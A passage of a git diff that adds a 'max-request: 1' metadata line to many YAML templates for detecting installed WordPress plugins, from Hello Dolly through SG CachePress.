     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
